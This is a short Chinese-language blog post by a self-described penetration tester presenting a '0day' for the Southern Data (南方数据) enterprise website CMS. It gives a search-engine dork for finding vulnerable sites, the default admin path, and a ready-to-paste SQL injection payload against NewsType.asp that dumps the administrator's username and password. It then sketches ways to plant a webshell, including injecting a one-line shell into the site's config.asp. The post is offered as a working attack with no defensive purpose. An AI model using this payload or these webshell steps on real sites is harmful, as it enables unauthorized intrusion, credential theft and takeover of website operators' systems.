南方数据企业0day漏洞爆后台密码

发布于 2016-11-10  966 次阅读


南方数据的漏洞比较多各种版本的漏洞也显而易见。
这里要讲的是南方数据企业0day直接爆后台密码方法。
南方数据企业0day漏洞爆后台密码
谷歌搜索:inurl:”HomeMarket.asp”
默认后台地址:/admin
直接在网址后面加上利用代码即可直接爆出管理员的帐号密码
利用代码:

NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='


爆出帐号密码后直接解密就可以获得管理员的帐号密码。然后在进一步的拿webshell
1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话,一句话地址写入到 http://www.xxx.com/inc/config.asp
这里只讲常见的几种,具体还是要看实际过程而定。


网络安全研究员、渗透测试攻城狮
文能社会工程学,武能过狗拿shell
日的了站,做的了饭。
人生格言:即使是咸鱼,也一定是最咸的那条